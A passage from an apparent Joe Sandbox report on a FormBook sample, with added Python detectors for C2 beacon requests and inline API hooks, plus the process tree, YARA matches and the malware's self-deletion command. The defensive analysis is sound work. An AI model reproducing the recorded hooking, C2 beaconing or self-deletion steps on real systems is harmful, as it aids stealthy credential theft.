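    if h.get("connection", "").lower() == "close" and len(h) <= 2:
        reasons.append("minimal header set (Host and Connection: close only)")
    q = req["query"]
    # Thresholds (2 params, keys <= 6 chars, a value >= 40 chars) are this example's assumptions.
    if len(q) == 2 and all(len(k) <= 6 for k in q) and any(len(v) >= 40 for v in q.values()):
        reasons.append("two short-key query parameters, one long opaque value")
    return reasons


def c2_url(req: Dict) -> str:
    """Rebuild the full URL for blocking or IOC sharing (no percent-decoding needed here)."""
    qs = "&".join("%s=%s" % (k, v) for k, v in req["query"].items())
    return "http://%s%s?%s" % (req["headers"]["host"], req["path"], qs)


if __name__ == "__main__":
    request = parse_http_request(CAPTURED_REQUEST)
    print(c2_url(request))
    for reason in beacon_indicators(request):
        print(" -", reason)
```

Run against session 1 instead (swap in the bitherders.com request line and Host), the same four traits fire; the indicators describe the client, so a host returning 403, 410 or a redirect page changes nothing about the verdict on the process that sent the request.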


                        Code Manipulations

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
GetMessageA    INLINE     explorer.exe

Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xE0
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xE0
GetMessageW    INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xE0
GetMessageA    INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xE0
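The Code Manipulations table records inline hooks on the message-loop APIs in explorer.exe: the first bytes of PeekMessageA/W and GetMessageA/W were overwritten, and the New Data column is what now sits at each function entry. The following is an added example, not part of the report: it shows the check a hunter would script, a byte-for-byte diff of a function's prologue in memory against the on-disk copy, and then tries to decode the overwritten bytes as one of the common x86-64 hook stubs (the analysis VM is 64-bit Windows 10, so explorer.exe is a 64-bit process) to recover the detour target. The clean prologue bytes, the load address, the GetMessageW jmp stub and the SendMessageA control case are constructed placeholders; reading the live bytes with ReadProcessMemory and the reference bytes from the DLL on disk is what the real check does. The PeekMessageA patched bytes are the six New Data bytes from the table; they do not decode as a textbook jmp or push/ret stub, which is the caveat the example encodes: report any difference, and treat decoding the stub as a bonus.

```python
"""Classify an inline (prologue) hook from the bytes seen at a function's entry.

Added example, not part of the Joe Sandbox report. CLEAN_PROLOGUE, ADDR, the
GetMessageW stub and the SendMessageA case are constructed placeholders; the
PeekMessageA bytes are the report's "New Data" for that function.
"""
import struct
from typing import Dict, List, Optional, Tuple

MASK64 = (1 << 64) - 1


def decode_trampoline(code: bytes, address: int) -> Tuple[str, Optional[int]]:
    """Recognise common x86-64 hook stubs placed at `address`; return (kind, target)."""
    if len(code) >= 5 and code[0] == 0xE9:                                  # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (address + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":                          # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (address + 6 + disp) & MASK64            # target = pointer slot, not the detour
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:              # push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    return "unrecognised patch", None


def check_prologue(name: str, address: int, on_disk: bytes, in_memory: bytes) -> Dict:
    """Diff the on-disk prologue against the live one and describe any change.

    Any difference counts as a hook, whether or not the stub is recognised:
    the report's own PeekMessageA bytes do not match a textbook trampoline.
    """
    n = min(len(on_disk), len(in_memory))
    changed = [i for i in range(n) if on_disk[i] != in_memory[i]]
    if not changed:
        return {"function": name, "hooked": False}
    kind, target = decode_trampoline(in_memory, address)
    return {"function": name, "hooked": True, "first_diff": changed[0],
            "kind": kind, "target": target, "bytes": in_memory[:8].hex(" ")}


# Constructed placeholders: a typical MSVC x64 prologue and a fake load address.
CLEAN_PROLOGUE = bytes.fromhex("48895c2408 4889742410 57 4883ec20")
ADDR = 0x00007FF8A1B02000


def demo() -> List[Dict]:
    """Three cases: the report's PeekMessageA bytes, a constructed jmp rel32 hook, an untouched function."""
    cases = {
        # Six "New Data" bytes from the Code Manipulations table, remainder left as on disk.
        "PeekMessageA": bytes.fromhex("488bb8811ee0") + CLEAN_PROLOGUE[6:],
        # Constructed: classic 5-byte jmp rel32 stub; target = ADDR + 5 + 0x1234.
        "GetMessageW": b"\xE9" + struct.pack("<i", 0x1234) + CLEAN_PROLOGUE[5:],
        # Constructed control case: nothing changed.
        "SendMessageA": CLEAN_PROLOGUE,
    }
    return [check_prologue(fn, ADDR, CLEAN_PROLOGUE, mem) for fn, mem in cases.items()]


if __name__ == "__main__":
    for result in demo():
        print(result)
```

On a live system the comparison has to account for legitimate relocations and import-address fixups inside the compared range (compare code bytes, not pointer fields), and for the loader's own detours on a few Windows APIs; the byte diff is the signal, the stub decoder only tells you where the detour goes when the pattern is a familiar one.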


Target ID: 1
Start time: 10:33:47
Start date: 28/01/2022
Path: C:\Users\user\Desktop\new_order.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\new_order.exe"
Imagebase: 0x400000
File size: 253458 bytes
MD5 hash: A0E70D1760E60D81E0F4AC2904FA8002
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                        Target ID:3
                        Start time:10:33:50
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\new_order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\new_order.exe"
                        Imagebase:0x400000
                        File size:253458 bytes
                        MD5 hash:A0E70D1760E60D81E0F4AC2904FA8002
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Target ID:5
                        Start time:10:33:55
                        Start date:28/01/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:9
                        Start time:10:34:18
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\explorer.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\explorer.exe
                        Imagebase:0x1160000
                        File size:3611360 bytes
                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:10
                        Start time:10:34:25
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\Desktop\new_order.exe"
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:11
                        Start time:10:34:27
                        Start date:28/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff724c50000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        No disassembly